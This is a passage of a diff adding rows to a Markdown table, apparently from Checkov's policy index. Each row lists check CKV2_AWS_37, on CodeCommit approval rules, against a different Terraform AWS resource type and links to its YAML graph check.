+| 1325 | CKV2_AWS_37              | resource                         | aws_redshift_subnet_group                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1326 | CKV2_AWS_37              | resource                         | aws_resourcegroups_group                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1327 | CKV2_AWS_37              | resource                         | aws_root                                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1328 | CKV2_AWS_37              | resource                         | aws_root_access_key                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1329 | CKV2_AWS_37              | resource                         | aws_route                                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1330 | CKV2_AWS_37              | resource                         | aws_route53_delegation_set                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1331 | CKV2_AWS_37              | resource                         | aws_route53_health_check                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1332 | CKV2_AWS_37              | resource                         | aws_route53_query_log                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1333 | CKV2_AWS_37              | resource                         | aws_route53_record                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1334 | CKV2_AWS_37              | resource                         | aws_route53_resolver_endpoint                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1335 | CKV2_AWS_37              | resource                         | aws_route53_resolver_rule                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1336 | CKV2_AWS_37              | resource                         | aws_route53_resolver_rule_association                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1337 | CKV2_AWS_37              | resource                         | aws_route53_vpc_association_authorization                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1338 | CKV2_AWS_37              | resource                         | aws_route53_zone                                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1339 | CKV2_AWS_37              | resource                         | aws_route53_zone_association                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1340 | CKV2_AWS_37              | resource                         | aws_route_table                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1341 | CKV2_AWS_37              | resource                         | aws_route_table_association                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1342 | CKV2_AWS_37              | resource                         | aws_s3_access_point                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1343 | CKV2_AWS_37              | resource                         | aws_s3_account_public_access_block                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1344 | CKV2_AWS_37              | resource                         | aws_s3_bucket                                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1345 | CKV2_AWS_37              | resource                         | aws_s3_bucket_analytics_configuration                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1346 | CKV2_AWS_37              | resource                         | aws_s3_bucket_inventory                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1347 | CKV2_AWS_37              | resource                         | aws_s3_bucket_metric                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1348 | CKV2_AWS_37              | resource                         | aws_s3_bucket_notification                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1349 | CKV2_AWS_37              | resource                         | aws_s3_bucket_object                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1350 | CKV2_AWS_37              | resource                         | aws_s3_bucket_policy                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1351 | CKV2_AWS_37              | resource                         | aws_s3_bucket_public_access_block                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1352 | CKV2_AWS_37              | resource                         | aws_sagemaker_endpoint                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1353 | CKV2_AWS_37              | resource                         | aws_sagemaker_endpoint_configuration                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1354 | CKV2_AWS_37              | resource                         | aws_sagemaker_model                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1355 | CKV2_AWS_37              | resource                         | aws_sagemaker_notebook_instance                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1356 | CKV2_AWS_37              | resource                         | aws_sagemaker_notebook_instance_lifecycle_configuration                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1357 | CKV2_AWS_37              | resource                         | aws_secretsmanager_secret                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1358 | CKV2_AWS_37              | resource                         | aws_secretsmanager_secret_rotation                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1359 | CKV2_AWS_37              | resource                         | aws_secretsmanager_secret_version                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1360 | CKV2_AWS_37              | resource                         | aws_security_group                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1361 | CKV2_AWS_37              | resource                         | aws_security_group_rule                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1362 | CKV2_AWS_37              | resource                         | aws_securityhub_account                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1363 | CKV2_AWS_37              | resource                         | aws_securityhub_member                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1364 | CKV2_AWS_37              | resource                         | aws_securityhub_product_subscription                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1365 | CKV2_AWS_37              | resource                         | aws_securityhub_standards_subscription                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1366 | CKV2_AWS_37              | resource                         | aws_service_discovery_http_namespace                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1367 | CKV2_AWS_37              | resource                         | aws_service_discovery_private_dns_namespace                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1368 | CKV2_AWS_37              | resource                         | aws_service_discovery_public_dns_namespace                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1369 | CKV2_AWS_37              | resource                         | aws_service_discovery_service                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1370 | CKV2_AWS_37              | resource                         | aws_servicecatalog_portfolio                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1371 | CKV2_AWS_37              | resource                         | aws_servicequotas_service_quota                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1372 | CKV2_AWS_37              | resource                         | aws_ses_active_receipt_rule_set                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1373 | CKV2_AWS_37              | resource                         | aws_ses_configuration_set                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1374 | CKV2_AWS_37              | resource                         | aws_ses_domain_dkim                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1375 | CKV2_AWS_37              | resource                         | aws_ses_domain_identity                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1376 | CKV2_AWS_37              | resource                         | aws_ses_domain_identity_verification                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1377 | CKV2_AWS_37              | resource                         | aws_ses_domain_mail_from                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1378 | CKV2_AWS_37              | resource                         | aws_ses_email_identity                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1379 | CKV2_AWS_37              | resource                         | aws_ses_event_destination                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1380 | CKV2_AWS_37              | resource                         | aws_ses_identity_notification_topic                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1381 | CKV2_AWS_37              | resource                         | aws_ses_identity_policy                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1382 | CKV2_AWS_37              | resource                         | aws_ses_receipt_filter                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1383 | CKV2_AWS_37              | resource                         | aws_ses_receipt_rule                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1384 | CKV2_AWS_37              | resource                         | aws_ses_receipt_rule_set                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1385 | CKV2_AWS_37              | resource                         | aws_ses_template                                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1386 | CKV2_AWS_37              | resource                         | aws_sfn_activity                                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1387 | CKV2_AWS_37              | resource                         | aws_sfn_state_machine                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1388 | CKV2_AWS_37              | resource                         | aws_shield_protection                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1389 | CKV2_AWS_37              | resource                         | aws_simpledb_domain                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1390 | CKV2_AWS_37              | resource                         | aws_snapshot_create_volume_permission                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1391 | CKV2_AWS_37              | resource                         | aws_sns_platform_application                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1392 | CKV2_AWS_37              | resource                         | aws_sns_sms_preferences                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1393 | CKV2_AWS_37              | resource                         | aws_sns_topic                                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1394 | CKV2_AWS_37              | resource                         | aws_sns_topic_policy                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1395 | CKV2_AWS_37              | resource                         | aws_sns_topic_subscription                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1396 | CKV2_AWS_37              | resource                         | aws_spot_datafeed_subscription                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1397 | CKV2_AWS_37              | resource                         | aws_spot_fleet_request                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1398 | CKV2_AWS_37              | resource                         | aws_spot_instance_request                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1399 | CKV2_AWS_37              | resource                         | aws_sqs_queue                                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1400 | CKV2_AWS_37              | resource                         | aws_sqs_queue_policy                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1401 | CKV2_AWS_37              | resource                         | aws_ssm_activation                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1402 | CKV2_AWS_37              | resource                         | aws_ssm_association                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1403 | CKV2_AWS_37              | resource                         | aws_ssm_document                                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1404 | CKV2_AWS_37              | resource                         | aws_ssm_maintenance_window                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1405 | CKV2_AWS_37              | resource                         | aws_ssm_maintenance_window_target                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1406 | CKV2_AWS_37              | resource                         | aws_ssm_maintenance_window_task                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1407 | CKV2_AWS_37              | resource                         | aws_ssm_parameter                                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1408 | CKV2_AWS_37              | resource                         | aws_ssm_patch_baseline                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1409 | CKV2_AWS_37              | resource                         | aws_ssm_patch_group                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1410 | CKV2_AWS_37              | resource                         | aws_ssm_resource_data_sync                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1411 | CKV2_AWS_37              | resource                         | aws_storagegateway_cache                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1412 | CKV2_AWS_37              | resource                         | aws_storagegateway_cached_iscsi_volume                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1413 | CKV2_AWS_37              | resource                         | aws_storagegateway_gateway                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1414 | CKV2_AWS_37              | resource                         | aws_storagegateway_nfs_file_share                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
